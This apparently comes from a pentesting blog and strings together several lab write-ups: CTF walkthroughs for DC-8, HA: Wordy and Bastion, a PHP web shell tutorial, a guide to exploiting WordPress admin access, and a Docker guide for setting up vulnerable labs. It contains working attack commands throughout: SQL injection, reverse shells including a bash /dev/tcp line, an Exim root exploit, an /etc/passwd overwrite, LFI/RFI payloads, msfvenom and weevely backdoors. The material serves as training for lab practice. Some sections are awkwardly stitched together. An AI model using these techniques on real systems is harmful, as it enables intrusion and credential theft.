Hacking Articles|Raj Chandel's Blog

DC8 VM is made by DCAU. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read a flag.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

netdiscover

nmap port scan

Enumeration

Browsing HTTP Service

SQL Injection for finding Credentials

Performing Directory Bruteforce

Exploiting

Editing Access given to user

Privilege Escalation

Exim

Capture the flag

Walkthrough

Network Scanning

The first step to attack is to identify the target. So, identify your target. To identify the target, we will use the following command:

netdiscover

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.0.6

We learned from the scan that we have the port 80 open which is hosting Apache httpd service with Drupal 7, and we have the port 22 open. This tells us that we also have the OpenSSH service running on the target machine.

Enumeration

Further, we need to start enumeration against the host machine, therefore we navigated to a web browser for exploring HTTP service, and DC:8- Welcome page will be opened in the browser. We enumerated the links provided on left. They seemed a bit fishy.

We enumerated these links to find an SQL related Errors. So we used the single quote(‘) to get an error message. We will enumerate this error further.

After some enumeration and poking around, we realised it is definitely SQL Error. We decided to run the sqlmap against the target machine. Here, we set the risk at 3 and level at 5. This is the option we got the best results in the least time.

sqlmap -u 192.168.0.6/?nid=2 --dbs --batch --risk 3 --level 5

After working for some time our sqlmap gave us the some important information. It showed us that there are 2 available databases in target machine which are:

1. d7db

2. information_schema

Now that we got the database named ‘d7db’, it’s time to further enumerate this database. We re-constructed our sqlmap script with parameters like [--tables] [--batch]. This helps us to enumerate the tables inside the database.

sqlmap -u 192.168.0.6/?nid=2 -D d7db --tables --batch --risk 3 --level 5

This gave us very large number of tables. We went through it with a keen eye. We found a table named ‘users’. This is definitely worth looking into.

Our reliable sqlmap provided us with further more details like we get the following details:

uid	name	init	Pass
1	admin	dc8blah@dc8blah.org	$D2tRcYRyqVFNSCONVYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
2	john	john@blahsdfsfd.org	$S$DqupvJbxVmqj r6cYePnx2A8911Ln7lsuku/3if/oRVZJaz5mKC2vF

So, we got hashes. Whenever we get some hashes all we remember is our best friend John The Ripper. The hashes were saved in a file named ‘hash’. We ran it through john. After working on it for some time. John cracked one of the hashes, it came out to be ‘turtle’.

john hash

This seemed as some information that might be useful somewhere else further down the road. For now, let’s try Directory Bruteforce using dirb. This surprisingly gave us a page with the name ‘user’.

dirb http://192.168.0.6

On opening the page in our browser, we saw that it requires some login credentials. We found some credentials in our exploitation of SQL Injection. We logged in this panel using the following credentials:

Username: john

Password: turtle

After logging in it was time to look around and try different options. While enumerating we stumbled upon Form settings. Let’s take a closer look on it.

Here we saw that we had an option to change the text format. We changed it to PHP code. This revealed the php code in the webpage. We edited this page with our php reverse shell so as to generate a shell over the target machine.

Now that we have edited out php code, we also started a netcat listener to receive a shell that would be generated on the execution of our php reverse shell script.

nc -lvp 1234

Now to submit the form with our php reverse shell script, we would have to enter some of these mandatory data. This details can be anything but they should support the format of the data supposed to be entered.

After typing in all that information, we clicked on the submit button. After few seconds, we got the shell from the target machine. It was a shell of user ‘www-data’. This was an improper shell. So, in order to convert in into a proper shell, we ran the python one liner mentioned below.

After getting a proper shell, it was a time to escalate privilege on this machine. So, to do that we ran the find command to find the files with the SUID permissions. We found a service named exim4. Now, in order to proceed further we are going to need the version of the exim4 tool. It will help us in searching for some exploit on the internet. This was found to be 4.89.

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@dc-8:/$ find / -perm -u=s -type f 2>/dev/null

www-data@dc-8:/$ exim --version | head -1

We surfed the web for an exploit regarding exim tool of version 4.89. ExploitDB came up with the rescue. It gave us this Local Privilege Escalation exploit. We examined it carefully.

Firstly, we traversed into the /tmp directory, because we need to transfer a file and /tmp directory has the writable permission. We downloaded it into our attacker machine i.e Kali Linux and renamed it raptor_exim_wiz.sh. We edited our IP address and the port which we will be using to capture the netcat session. After that we created a server on the Kali Linux to send the file directly to the target machine. We used the wget command for this transfer. After transferring the script on the target machine, we gave it proper permissions so that it can execute properly.

www-data@dc-8:/tmp$ wget http://192.168.0.8:8000/raptor_exim_wiz.sh

www-data@dc-8:/tmp$ chmod 777 raptor_exim_wiz.sh

After providing with the proper permissions, it’s time to run a listener so that we can capture the shell which would be generated by this script. After that, we ran the command with the option to invoke netcat as shown in the image given below. This script invoked a netcat shell to our attacker machine on port 4444.

nc -lvp 4444

www-data@dc-8:/tmp$ ./raptor_exim_wiz.sh -m netcat

We successfully got the shell on the target machine. On running the whoami command, we got a satisfactory response of ‘root’. We traversed into root directory using the cd command. We found our flag at this location.

whoami

cd /root

cat flag.txt

This is our Walkthrough for HA: Wordy” and this CTF is design by Hacking Articles Team 😊, hope you will enjoy.

The lab is designed for Beginners for WordPress Penetration Testing Practices. This lab is designed as a Capture the flag and not as a boot to root, but it contains multiple Vulnerabilities (OWASP Top-10) that should be exploited to complete this CTF Challenge. This helps the CTF player to understand all the ways in which a WordPress machine can be vulnerable.

Level: Easy

You can download this lab from here.

Penetration Testing Methodology

Network Scanning

· Host IP (Netdiscover)

· Open Port & Services (Nmap)

Enumeration

· Web Directory Brute force (Dirb)

· Scanning WordPress (Wpscan)

Exploiting Reflex Gallery (1st Method: file Upload)

· Spawning Shell (Metasploit)

· Capture the 1^st flag

Privilege Escalation

· Abusing SUID Binaries

· Capture 2^nd Flag

Exploiting Mail_Masta & WP_Support (2nd Method- LFI & CSRF)

· LFI

· CSRF

· Capture the flag

· Inject PHP malicious code

· Spawning Shell (Netcat)

Exploiting WP_Symposium (3rd Method: SQL Injection)

· Web Directory Enumeration (Dirb)

· Obtaining Database Info (Metasploit)

Exploit Gwolle Guestbook (4th Method: RFI)

· Inject PHP malicious code

· Spawning Shell (Netcat)

Exploit Slideslow Gallery (5th Method: Authenticated File_Upload)

· Spawning Shell (Metasploit)

Walkthrough

Network Scanning

Starting with netdiscover, to identify host IP address and thus we found 192.168.0.27. let’s now go for advance network scanning using nmap aggressive scan.

nmap -A 192.168.0.27

We saw from the scan result that the port 80 open which is hosting Apache httpd service.

Enumeration

Since we got the port 80 open, we decided to browser the IP Address in the browser but found nothing.

Further we move for directory enumeration and use dirb for brute forcing.

dirb http://192.168.0.27/

This gave us a directory called “wordpress” as shown in the given image.

Upon finding the directory, we opened the URL in our browser.

Now that we have the wordpress site, it’s logical to perform a wpscan on our lab.

wpscan --url http://192.168.0.27/wordpress --enumerate p

Now we move further down in the wpscan result and found the reflex gallery plugin. It is vulnerable to the File Upload. As you can observe that it has shown Metasploit module for exploiting reflex gallery.

Exploiting Reflex Gallery (1^st Method: File Upload )

Thus, we use the following module and set the argument such as rhosts and targeturi and then run the exploit to get the meterpreter session.

msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload

msf5 > set rhosts 192.168.0.27

msf5 > set targeturi /wordpress

msf5 > exploit

Boom!! Here we have our meterpreter session which you can observe in the given below image.

meterpreter > shell

meterpreter > python3 -c ‘import pty; pty.spawn(/”bin/sh”)’

Privilege Escalation

As soon as we gained the proper shell, we enumerated the machine for flags. We found flag1.txt in the /home/raj/ directory

cd /home

cd raj

cat flag1.tx

Now for privilege escalation It is a regular practice to check for any file having SUID permissions with the help of “Find” command. We used the following command to enumerate all binaries having SUID permissions:

find / -perm -u=s -type f 2>/dev/null

Find command shown that wget and cp command have the SUID permissions. This could be a possible for escalating root privilege.

SUID Binaries command gave us all the sensitive files that can be read/write and hence with the help of wget command we can overwrite the /etc/passwd.

“To know more how to edit /etc/passwd file read Full-Article from article1& article2”.

Now we are creating the salt value of password for our new user and this will be done by using “openssl” following command as mentioned in the screenshot below:

openssl passwd -1 -salt ignite pass123

And we will get our hash value something like this: “$1$ignite$3eTbJm980Hz.k1NTdNxe1”; This is going to help us create an entry of our user in the /etc/passwd file of the target machine. Now we have copied the entire content of /etc/passwd file as shown in the below image in our local machine.

cd /home/raj

cat /etc/passwd

After pasting above copied content, we will edit a new record for the user “ignite” then paste the above-copied hash password in the record as shown below.

cat /etc/passwd

Now we want to overwrite passwd file inside /etc folder to replace the original passwd file. We can use wget with -O to download the passwd file from our machine inside a /etc directory which will overwrite the existing passwd file.

cd /home/raj

cd /etc

wget -O passwd http://192.168.0.16:8000/passwd

Now when you check, you will see that the / etc / passwd file has been updated as shown in the image below.

tail /etc/passwd

Now let’s try to access root shell and we have to switch user as ignite for escalating privileges.

su ignite

cd /root

cat proof.txt

Awesome!! We found the final flag along with root privileges. Let’s go for 2^ndmethod……..

Exploiting Mail_Masta & WP_Support (2^ndMethod- LFI & CSRF)

We can solve the lab using another method as well. Earlier our Wpscan showed us the Mail Masta plugin which is vulnerable to LFI (Local File Inclusion). On exploring the following link, we got proof-of-concept would be to load passwd file.

http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

So, we framed our URL to exploit the LFI It turned out to be like this:

http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Now we browsed the URL in our browser to find the output of cat command on /etc/passwd file.

Now after some enumeration, we found that there are some credentials stored inside the /etc/apache2/.htpasswd. So, let’s read them using curl while exploiting LFI.

curl http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/apache2/.htpasswd

We were successful in obtaining a hash. It seemed like Base64 Encryption. We used the base64 command with -d parameter to decode this hash as shown in the image.

echo “YWFydGk6YWFydGlAZ21haWwuY29t” | base64 -d

It turned out to be aarti:aarti@gmail.com. This must be login details but there is no password.

Aarti is a member of wordpress and server user account. We can confirm this from our previous assessment of wpscan result. It shows 2 users admin and aarti.

CSRF:WP Support Plus Responsive Ticket

When we scanned wordpress with wpscan for vulnerable plugins, we found many of them and here, one by one we can exploit them to our desire. To do so, we will use searchsploit in order to find exploits for wp support as this was hinted to us during the said scan. Therefore, type the following for this:

searchsploit wp-support

searchsploit -m 41006

cat 41006.txt

Once the above commands are executed, we will now copy the highlighted content and modify it (as shown in the image below) to change username value to “aarti” and email value to “aarti@gmail.com” :

Username:

As we execute the above script, the webpage will be directed to the log in screen; asking us the username, which we have already found.

Here, as soon as we click on login button, we will be logged in as a user without entering password because of incorrect usage of wp_set_auth_cookie() due to CSRF vulnerability.

While traversing the website we found a second flag and a root password in biographical info.

The password we found was encoded using base64 algorithm. To decrypt the password, we used the following command :

echo “SWduaXRlQDEyMw==” | base64 -d

Upon decryption we found the root password is Ignite@123. This is the password for the admin user in Wordpress.

Now, to proceed further we used the php reverse shell. We changed the IP Address to our current IP Address and give any port you want and start netcat listener for obtaining reverse connection.

And then we copied the above php-reverse-shell and paste it in 404.php template of wordpress as shown in the image below :

Then after saving the 404.php file we will run the file through URL in a browser as shown in the image below :

Simultaneously, when you run netcat, you will have your session upon execution of 404.php file. Access netcat using the following command :

nc -lvp 1234

Exploiting WP_Symposium (3^rd Method: SQL Injection)

Enumeration

To further enumerate, we performed a Directory Bruteforce. There are a lot of situations where we need to extract the directories with specific extension over the target server, and for this we can use the -X parameter in dirb scan. This parameter accepts the file extension name and then searches the given extension files over the target server or machine. For instance, here we need to find text files, so we will use the following command for it :

dirb http://192.168.0.27 -X .txt

Among all the text files the message in notes.txt stood out. It said, “you need to zip your way out” and this message is obviously a hint to look for a zip file.

Now, again we will use dirb -X extension to find zip.

dirb http://192.168.0.27 -X .zip

Upon finding a zip file and then we download the file using the following wget and then unzip the command:

wget http://192.168.0.27/secret.zip

unzip secret.zip

To unzip the file successfully, you will need a password because it was a password protected zip file, but as we don’t know the said password, we will try to exploit a plugin.

We will use WordPress plugin wp-symposium version 15.5.1 which allows to retrieve all the database content, which includes users’ details and password.

Luckily, we found exploit for this vulnerability inside Metasploit framework and thus load the below module and execute following command

use auxiliary/admin/http/wp_symposium_sql_injection

msf auxiliary(wp_symposium_sql_injection) > set rhosts 192.168.0.27

msf auxiliary(wp_symposium_sql_injection) > set targeturi /wordpress

msf auxiliary(wp_symposium_sql_injection) > exploit

Nice!!! Here we found the relevant username and email id as user: admin and aarti respectively.

Now will unzip the file we found earlier that is secret.zip with hash we found in wp-symposium exploit.

cat link.txt

As soon as we unzip the file, we found that this lab can be solved with multiple ways with the list of exploits.

Exploit Gwolle Guestbook (4^thMethod: RFI)

Now again we will run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).

We will follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on Kali Linux. We will copy it to desktop and rename it to wp-load.php. To execute our php shell using RFI we will start our python HTTP server to exploit RFI on the target machine.

mv php-reverse-shell.php shell.phpwp-load.php

python -m SimpleHTTPServer

We set up our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell.

http://192.168.0.27/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.0.27:8000/shell.php

Exploit Slideslow Gallery (5^th Method: Authenticated File_Upload)

Now we will exploit another vulnerable plugin that we found in secret.zip. The WordPress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it’s possible to upload any file type.

Metasploit

You will get exploit for this vulnerability inside Metasploit framework and thus load the below module and execute following command:

use exploit/unix/webapp/wp_slideshowgallery_upload

set targeturi /wordpress

set rhosts 192.168.0.27

set wp_user admin

set wp_password Ignite@123

exploit

As the above commands are executed, you will have your meterpreter session. Just as portrayed in this article, there are multiple methods to exploit a wordpress platformed website.

Today we are going to solve another CTF challenge called “Baniston” which is categorized as a retired lab developed by Hack the Box for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Level: Intermediate

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are online, therefore they have static IP. The IP of Baiston is 10.10.10.134 so let’s start with nmap port enumeration.

From the given image below, we can observe that we found ports 22, 135, 139, 445 are open. This means the services like ssh, msrpc, smb etc are running in the victim’s network.

nmap -A 10.10. 10.134

As we can clearly note form the nmap scan that we have the SMB service running, and we don’t have any credentials for the ssh so we went directly on SMB. We logged in using the command mentioned. There is list of shared directories. We tried bunch of them but only Backups seems to be accessible. We enumerated that directory. We find a notes.txt, a temp file, and a directory named WindowsImageBackup. Let’s transfer the notes.txt file on our machine to read its contents.

smbclient -L //10.10.10.134

smbclient //10.10.10.134/Backups

smb: \> ls

smb: \> get note.txt

After transferring the file, we went back on our kali shell and read the file using the cat command.

cat note.txt

It contained the message that might be a hint. Let’s keep it in mind and enumerate further.

“Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.”

We went back to the smb, in order to look at the directory we found earlier. It contained another directory with the name of the system, L4mpje, we went into that directory as well to find a Backup directory. Here we found some vhd images. On a close inspection we found that these are system backup files.

smbclient //10.10.10.134/Backups

smb: \> cd WindowslmageBackup

smb: \WindowslmageBackup\> ls

smb: \WindowslmageBackup\> cd L4mpje-PC

smb: WindowsImageBackup\L4mpje-PC\> ls

smb: \WindowslmageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"

smb: \WindowslmageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls

The note said that trying to download them will take a very long time, we decided that mounting them is the way to go. To do this we are going to create these directories as shown in the image.

mkdir /mnt/L4mpje-PC

mkdir /mnt/vhd

Now for the mounting of those backups we are going to use the CIFS protocol followed by the path of the backup folder, with an anonymous user.

mount -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC/ -o user=anonymous

Now using the qemu-nbd we will mount the specific vhd backup file. After mounting we went into the vhd directory to see the files that the backup contained.

qemu-nbd -r -c /dev/nbd0 "/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-al7c-806e6f6e6963.vhd"

mount -r /dev/nbdOpl /mnt/vhd

cd /mnt/vhd

ls -la

We enumerated around for a while and finally we went into the System32 directory to find a config directory. Here we found the SAM and the SYSTEM file.

cd Windows/System32/config

ls -la

Now we have to extract the credentials from these two files. To do that we are going to use samdump script. After running, we got the following the following hashes. Two of these users are disabled.

samdump2 ./SYSTEM ./SAM

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfeed16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfeed16ae931b73c59d7e0c089c0::: L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

We cracked the hash online to find the password for the user L4mpje to be bureaulampje.

Now we will login into the lab using the ssh while using the username l4mpje and the password bureaulampje. After logging in we traversed to the Desktop of the user to read the user.txt flag

ssh l4mpje@10.10.10.134

l4mpje@BASTION C:\Users\L4mpje>cd Desktop

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt

Now it’s time to escalate privileges on the lab. We enumerated the user directory to look into the AppData directory. Here inside the Roaming directory we saw that mRemoteNG is installed on the machine. We got some xml files inside it. We tried to opened them using the type command to find an encode password.

Password: aEWNFV5uGcjUHFOuS17QTdT9kVqtKCPeoCONw5dmaPFjNO2kt/z05xDgE4HdVmHAowVRdC7emf7lWWAlOdOKiw==

l4mpje@BASTION C:\Users\L4mpje>cd AppData\Roaming\mRemoteNG

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml

Now, we headed to Google to find any way to decrypt this encoded text, we found this mRemoteNG-Decrypt script for decrypting our password. We cloned the git to our system and ran the python script with the encoded text as a parameter. The password came out to be:

Password: thXLHM96BeKLOER2

git clone https://github.com/haseebT/mRemoteNG-Decrypt.git

cd mRemoteNG-Decrypt/

python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHFOuS17QTdT9kVqtKCPeoCONw5dmaPFjNO2kt/z05xDgE4HdVmHAowVRdC7emf7lWWAlOdOKiw==

Now we will get the ssh as administrator user with our decoded password.

ssh administrator@10.10.10.134

Now let’s enumerate the final flag. We found the root flag on the Desktop.

administrator@BASTION C:\Users\Administrator>cd Desktop

administrator@BASTION C:\Users\Administrator\Desktop>dir

administrator@BASTION C:\Users\Administrator\Desktop>type root.txt

This post will describe the various PHP web Shell uploading technique to take unauthorized access of the web server by injecting malicious piece of code that are written in PHP.

Table of content

Introduction of PHP Web shells
Inbuilt Kali’s web shells

simple backdoor.php
qsd-php backdoor web shell
php-reverse-shell.php

Using MSF venom
Weevely php web shell
Php_bash web shell

Requirements

Attacker: Kali Linux

Target: Web for Pentester, DVWA

Introduction of PHP Web Shells

Web shells are the scripts which are coded in many languages like PHP, Python, ASP, Perl and so on which further use as backdoor for illegitimate access in any server by uploading it on a web server.

The attacker can then directly perform the read and write operation once the backdoor is uploaded to a destination, you can edit any file of delete the server file. Today we are going to explore all kinds of php web shells what-so-ever are available in kali Linux and so on. So, let’s get started.

Kali Linux has inbuilt PHP Scripts for utilizing them as backdoor to assist Pen-testing work. They are stored inside /usr/share/webshells/php and a pen-tester can directory make use of them without wasting time in writing PHP code for malicious script.

· simple backdoor.php

· qsd-php backdoor web shell

· php-reverse-shell.php

Simplebackdoor.php shell

Simple-backdoor.php is a kind of web shell that can generate a remote code execution once injected in the web server and script made by “John Troon”. It is already accessible in Kali in the/usr/share/web shells/php folder as shown in the pic below and after that we will run ls -al command to check the permissions given to the files.

cd /usr/share/webshells/php

ls -al

Now you must discover a way to upload a shell in your application. As we have doing all this Web for Pentesters, so we will first try to upload here simple backdoor php shell which is already available in kali and click on send file to upload the shell.

As you can see, we have successfully uploaded the malicious php file and received the hyperlink for uploaded file.

Thus, we try to access simple-backdoor.php and obtain following output. As we can observe that here “cmd=cat+/etc/passwd” is a clear indication for Remote code execution.

So, let’s try and run cat+/etc/passwd to retrieve all the passwords of the server.

cmd=cat+/etc/passwd

As result we have extracted all records of passwd file, hence we can execute any command such as ls, cp and so on therefore we can obtain web shell by exploiting REC.

qsd-php backdoor shell

An exploit of a web shell generally considered as backdoor that enables an attacker to access and control a server remotely and qsd-php backdoor shell is a kind of backdoor which provide a platform for executing system command and the wonderful script made by “Daniel Berliner”.

As you can see, we have uploaded the qsd-php-backdoor.php file successfully.

Then try accessing qsd-php-backdoor.php as you did in the previous step and you will find something as shown in the image below. Here you can perform directory traversal and you can also access the Web Server directory directly by entering the command and clicking on the go button.

As you can observe we have accessed the current directory directly without executing any system command.

We can also execute arbitrary system command since this backdoor provides a platform to execute shell command such cat/etc/passwd, ls -al and much more. We can also run two commands simultaneously and see the result.

As you can see that we have got the result successfully.

Php-reverse shell

Now its turn to move towards our next php web shell which is php-reverse-shell.php which will open an outbound TCP connection from the webserver to a host and script made by “pentestmonkey”. A shell will be attached to the TCP connection (reverse TCP connection). You can run interactive programs such as telnet, ssh etc with this script. It is different from the other Web shells script, through which you can send a single command and then return the output.

For this we need to open this script through nano

nano php-reverse-shell.php

Here we need to give the LISTEN_IP (Kali Linux) where we want the connection and LISTEN_PORT number can be set any.

Now we need to upload this web shell in order to get the reverse connection. So, we will upload the malicious file and on other hand start netcat listener inside a new terminal.

We can see that it is uploaded successfully.

Now as soon as you will execute the uploaded file and If all went well, then, the web server should have thrown back a reverse shell to your netcat listener. And you can verify that we have got the shell successfully.

PHP Backdoor using MSFvenom

We can also generate a php web shell with the help of msfvenom. We, therefore, write use msfvenom following command for generating malicious php code in raw format.

msfveom -p php/meterpreter/reverse_tcp lhost=192.168.1.106 lport=4444 R

Then copy the code and save it by the name of meter.php

Now we will upload this malicious shell in DVWA lab to get the reverse connection. Now you can see the "meter.php successfully uploaded" message from the screenshot, meaning that our php backdoor is effectively uploaded.

In order to execute the shell, the we will open the URL of DVWA.

Simultaneously we will start multi handler where we will get the meterpreter shell and we will run the following commands where we need to specify the lhost and lport to get the reverse connection.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.106

set lport 4444

exploit

sysinfo

As soon as you will explore the uploaded path and execute the backdoor, it will give you a meterpreter session.

Weevely Shell

Weevely is a stealthy PHP internet shell which simulates the link to Telnet and is designed for remote server administration and penetration testing. It can be used as a stealth backdoor a web shell to manage legit web accounts, it is an essential tool for web application post exploitation. We can generate a PHP backdoor protected with the password.

Open the terminal and type weevely to generate a php backdoor and also set a password as in our case we have taken “raj123” and save this web shell as weevely.php

weevely generate raj123 weevely.php

Now upload this web shell at the target location as in our case we have uploaded it at Web for pen testers and we will open the URL in the browse to execute the web shell.

Type the following instruction to initiate the web server attack and put a copied URL into the Weevely command using password raj123 and you can see that we have got the victim shell through weevely. We can verify this by id command.

weevely http://192.168.1.104/upload/images/weevely.php raj123

You can also check all the functionality of weevely through help command.

PHPbash shell

Phpbash is an internet shell that is autonomous, semi-interactive. We are going to download it from GitHub and then we will go inside the directory phpbash and execute ls -al command to check the available files.

git clone https://github.com/Arrexel/phpbash.git

cd phpbash/

ls -al

So inside phpbash, we found a php script named “phpbash.php”, upload this script at your target location.

Now we will upload this web shell in DVWA lab and we can see the message that it is uploaded successfully.

Going ahead; we will open the URL to execute the shell.

Here our phpbash malicious file is executed and given the web shell. The benefit of the phpbash is that it doesn’t required any type of listener such as netcat because it has inbuilt bash shell that you can observe from the given image.

As result we have bash shell of www-data and we can execute system command directly through this platform.

So, this way we have explored and performed numerous ways to get the web shell through php web shells; which you can find under this single article.

This post is related to WordPress security testing to identify what will be possible procedure to exploit WordPress by compromising admin console. We have already setup WordPress in our local machine but if you want to learn WordPress installation and configuration then visit the link given below.

https://www.hackingarticles.in/wordpress-penetration-testing-lab-setup-in-ubuntu/

As we all know wpscan is a standalone tool for identifying vulnerable plugins and themes of WordPress, but in this post, we are not talking wpscan tutorial.

Table of content

· Metasploit Framework

· Injecting Malicious code in WP_Theme

· Upload Vulnerable WP_Pulgin

· Inject Malicious Plugin

Requirement:

Host machine: Wordpress

Attacker machine: Kali Linux

WordPress Credential: admin:admin (in our case)

Let’s begin!!

As you can observe that I have access of wordpress admin console over the web browser, for obtaining web shell we need to exploit this CMS. There are multiple methods to exploit Wordpress, let’s go for some operations.

Metasploit Framework

The very first method that we have is Metasploit framework, this module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is authenticated code execution by design, it should work on all versions of WordPress and as result it will give meterpreter session of the web server.

msf > use exploit/unix/webapp/wp_admin_shell_upload

msf exploit(wp_admin_shell_upload) > set USERNAME admin

msf exploit(wp_admin_shell_upload) > set PASSWORD admin

msf exploit(wp_admin_shell_upload) > set targeturi /wordpress

msf exploit(wp_admin_shell_upload) > exploit

Great!! It works wonderfully and you can see that we have own the reverse connection of the web server via meterpreter session.

Injecting Malicious code in WP_Theme

There's also a second technique that lets you spawn web server shells. If you have a username and password for the administrator, log in to the admin panel and inject malicious PHP code as a wordpress theme.

Now go for theme twenty fifteen chose the templet into 404.php

You see a text area for editing templet, inject your malicious php code here to obtain reverse connection of the web server.

Now, to proceed further, we used the reverse shell of PHP (By Penetstmonkey). And then we copied the above php-reverse-shell and paste it into the 404.php wordpress template as shown in the picture below. We have altered the IP address to our present IP address and entered any port you want and started the netcat listener to get the reverse connection.

Update the file and browse the following URL to run the injectd php code.

http://192.168.1.101/wordpress/wp-content/themes/twentyfifteen/404.php

you will have your session upon execution of 404.php file. Access netcat using the following command:

Upload Vulnerable WP_Pulgin

Some time logon users do not own writable authorization to make modifications to the wordpress theme, so we choose "Inject WP pulgin malicious" as an alternative strategy to acquiring a web shell.

So, once you have access to a WordPress dashboard, you can attempt installing a malicious plugin. Here I've already downloaded the vulnerable plugin from exploit db.

Click here to download the plugin for practice.

Since we have zip file for plugin and now it’s time to upload the plugin.

Dashboard > plugins > upload plugin

Browse the downloaded zip file as shown.

Once the package gets installed successfully, we need to activate the plugin.

When everything is well setup then go for exploiting. Since we have installed vulnerable plugin named “reflex-gallery” and it is easily exploitable.

You will get exploit for this vulnerability inside Metasploit framework and thus load the below module and execute the following command:

use exploit/unix/webapp/wp_slideshowgallery_upload

set rhosts 192.168.1.101

set targeturi /wordpress

exploit

As the above commands are executed, you will have your meterpreter session. Just as portrayed in this article, there are multiple methods to exploit a WordPress platformed website.

Inject Malicious Plugin

As you have seen above that we have uploaded the vulnerable plugin whose exploit is available. But this time we are going to inject our generated malicious plugin for obtain reverse shell.

This is quite simple as we have saved malicious code for reverse shell inside a php file named “revshell.php” and compressed the file in zip format.

exec(“/bin/bash -c ‘bash -i >& /dev/tcp/10.0.0.1/8080 0>&1’”)

Again, repeat the same step as done above for uploading plugin “revshell.zip” file and start netcat listener to obtain the reverse connection of the target machine.

Once the package gets installed successfully, we need to activate the plugin.

As soon as you will activate the plugin it will through the reverse connection as netcat session.

For web application penetration practice, we all look for vulnerable applications like DVWA and attempt to configure vulnerable practice environments. As we all know, it's time consuming activity and it takes a lot of effort, but this can be done in a couple of minutes with the help of the docker.

In this post you will learn how to configure vulnerable web applications (DVWA, BWAPP & etc) with the help of docker.

Table of Content

· Requirement

· Objective

· Web application

· DVWA

· Mutillidae

· bWAPP

· Another Method

Requirement-Ubuntu 18.0

Objective:

Configure web application server on docker

Web Application

A web application is a remote server software application. In general, web browsers are used through a network, such as an internet, to access Web applications. Like a software program running on a desktop or desktop application, the Web-app permits interaction with the user and can be designed for a wide range of applications.

Docker

Docker is a third-party tool developed to create an isolated environment to execute any application. These applications are run using containers. These containers are unique because they bring together all the dependencies of an application into a single package and deploy it. Now, to work with docker you will need to install docker engine in your host.

Run following command to install docker:

apt update

apt install docker.io

Then execute the following command to activate docker

systemctl start docker

systemctl enable docker

And we have installed docker version 18.09.7 in our local machine.

Configure DVWA on Docker

Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled classroom environment.

The aim of DVWA is to practice some of the most common web vulnerabilities, with various levels of difficulty, with a simple straightforward interface. Please note, there are both documented and undocumented vulnerabilities with this software. This is intentional. You are encouraged to try and discover as many issues as possible.

To install and configure DVWA through docker is quite simple then manual approach, you can search for its docker image directly by typing following command on the terminal.

docker search web-dvwa

Here you can observe that it has showed the docker image for dvwa as per given rating and even you can search for the same over internet. You will obtain same output as shown below.

Now we can directly pull the package by executing the following command:

docker pull vulnerables/web-dvwa

And then to start docker service for dvwa; enter below command in your terminal.

docker run -p 80:80 vulnerables/web-dvwa

Good! We have successfully configured the dvwa lab in ubuntu as we can see that we are welcomed by the login page.

Enter the following URL and click on Create/Reset Database.

http://localhost/dvwa/setup.php

Once the database will get create you can login into application to access the web console.

And we have our DVWA application ready for use, thus we can see it required very less effort.

Configure Mutillidae on Docker

OWASP Mutillidae is a free open source purposely vulnerable web application providing an enthusiastic goal for web security. It’s a laboratory which provides a complete test environment for those who are interested in SQL injection acquisition or improvement. This is an easy-to-use Web hacking environment designed for laboratories, security lovers, classrooms, CTFs, and vulnerability assessment targets, and has dozens of vulnerabilities and tips to help the user.

Similarly, we can run mutillidae using docker without wasting much time in manual configuration. Repeat the same step as done before, first pull the package and then use the docker to start mutillidae over a specific port.

docker pull szsecurity/mutillidae

docker run -p 1337:80 szsecurity/mutillidae

This time we had chosen port 1137 to launch the mutillidae application. Thus, we will open this our local browser by the following URL: localhost:1337 where we will find an option of reset database. Just click on it to reset the database.

ConfigureWebGoat on Docker

WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons.

This program is a demonstration of common server-side application flaws. The exercises are intended to be used by people to learn about application security and penetration testing techniques.

